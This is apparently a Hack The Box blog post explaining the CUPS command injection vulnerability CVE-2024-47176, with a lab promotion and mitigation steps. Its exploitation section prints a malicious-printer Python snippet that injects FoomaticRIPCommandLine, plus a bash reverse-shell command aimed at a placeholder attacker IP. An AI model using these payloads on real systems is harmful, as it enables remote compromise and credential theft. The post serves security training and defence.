CVE Explained
CVE-2024-47176 explained: Understanding the CUPS vulnerability
We deep dive into CVE-2024-47176, a CUPS command injection vulnerability that allows attackers to execute arbitrary commands remotely on the target machine without authentication.
HTB-Bot,
Mar 05
2025
What is CVE-2024-47176?
CVE-2024-47176 is a command injection vulnerability in CUPS (Common Unix Printing System) that allows unauthenticated remote attackers to install a malicious printer and execute arbitrary commands on a target system.
The flaw exists in Foomatic-RIP, a print processing filter, which fails to properly sanitize input, enabling attackers to inject commands into the print job pipeline.
This vulnerability impacts CUPS 2.4.2 and possibly earlier versions, making it a critical security concern for Linux-based systems that rely on CUPS for network printing.
Discovered by EvilSocket, CVE-2024-47176 is part of a set of four vulnerabilities in CUPS, which also include:
-
CVE-2024-47076 (libcupsfilters)
-
CVE-2024-47175 (libppd)
-
CVE-2024-47177 (Foomatic-RIP)
Let’s break down how this vulnerability works, how attackers exploit it, and how to mitigate it.
How does CVE-2024-47176 work?
CUPS is a print server that allows users to manage and process print jobs. It typically listens on TCP port 631 for web-based management and UDP port 631 for automatic printer discovery.
The vulnerability in CUPS-browsed allows an attacker to send a malicious printer installation request over UDP. Once installed, the malicious printer is configured to inject commands via Foomatic-RIP, leading to remote code execution (RCE).
The attack chain follows these steps:
-
Send a printer installation request to the CUPS server via UDP/631.
-
The server auto-configures the printer based on attacker-supplied attributes.
-
Inject a malicious command via the
FoomaticRIPCommandLineattribute. -
Trigger command execution by printing a test page.
Get hands-on practice with EvilCUPS!
EvilCUPS is a Medium difficulty Linux machine that features a CUPS command injection vulnerability (CVE-2024-47176). This CVE allows remote unauthenticated users the ability to install a malicious printer on the vulnerable machine over UDP/631.
This printer is configured to utilize [Foomatic-RIP] Loading Preview...
The CUPS web server is configured to allow anonymous users access to TCP/631. Navigating here makes it possible to print a test page on the malicious printer and gain access as the "lp" user. This user has the ability to retrieve past print jobs, one of which contains the root password to the box.
PLAY THE MACHINESteps to exploit CVE-2024-47176
Here’s how attackers exploit this vulnerability using a public proof-of-concept (PoC).
Step 1: Scan for CUPS services
Using Nmap, attackers can identify a target running CUPS:
nmap -p- --min-rate=1000 -T4 <target-ip>
nmap -p631,22 -sC -sV <target-ip>
If TCP/631 (IPP) and UDP/631 (cups-browsed) are open, the system is vulnerable.
Step 2: Install a malicious printer
Attackers send a specially crafted IPP packet to trick CUPS into installing a fake printer. This is achieved using the ippserver library:
class MaliciousPrinter(behaviour.StatelessPrinter):
def __init__(self, command):
self.command = command
super().__init__()
def printer_list_attributes(self):
return {
(SectionEnum.printer, b'printer-uri-supported', TagEnum.uri): [self.printer_uri],
(SectionEnum.printer, b'printer-more-info', TagEnum.uri): [
f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()
]
}Step 3: Trigger remote code execution
Once the malicious printer is installed, attackers print a test page to trigger the execution:
python3 exploit.py <attacker-ip> <target-ip> "bash -c 'bash -i >& /dev/tcp/<attacker-ip>/9001 0>&1'"Alternatively, this can be done manually by:
-
Navigating to
http://<target-ip>:631. -
Clicking Printers > Malicious Printer.
-
Selecting Print Test Page.
This executes the FoomaticRIPCommandLine payload, granting a reverse shell as the lp user.
What can Line Printer (LP) do?
Once attackers gain initial access as lp, they can escalate privileges by retrieving past print jobs stored in /var/spool/cups/.
Since CUPS caches print jobs, attackers can access previously printed files, which may contain sensitive credentials such as the root password.
By analyzing cached jobs, they can extract credentials and escalate to root using:
su rootThis completes the full attack chain, leading to complete system compromise.
The "Line Printer" user is not considered a privileged account, one of the few privileges it has outside of being a standard user is the ability to read past print jobs.
That is not to say this isn't a critical exploit, as there may be other ways to escalate privileges and this could be the initial foothold into the companies network. Even without administrative privileges, they can turn this box into a router and start accessing devices on the local network, often times this leads to a complete compromise of the network.
Mitigating CVE-2024-47176
To defend against this vulnerability, system administrators should:
-
Apply the latest security patches: Ensure CUPS is updated to the latest version.
-
Disable remote printer auto-discovery: Modify
/etc/cups/cupsd.confto restrict access: -
Consider if CUPS is required at all to remove the service.
<Location />
Order allow,deny
Deny from all
</Location>-
Restrict access to TCP/631 and UDP/631; use firewall rules to block unauthorized access.
sudo ufw deny 631/tcp
sudo ufw deny 631/udp-
Monitor print job logs: Regularly check
/var/spool/cups/for suspicious activity.
Stay ahead of threats with Hack The Box
HTB releases new content every month that’s based on emerging threats and vulnerabilities. This allows teams to train on real-world, threat-landscape-connected scenarios in a safe and controlled environment.
In response to this vulnerability, we released EvilCUPS Loading Preview... Loading Preview...
Organizations like Toyota, NVISO, and RS2 are already using the platform to stay ahead of threats with hands-on skills and a platform for acquiring, retaining, and developing top cyber talent.
ContentsLatest News
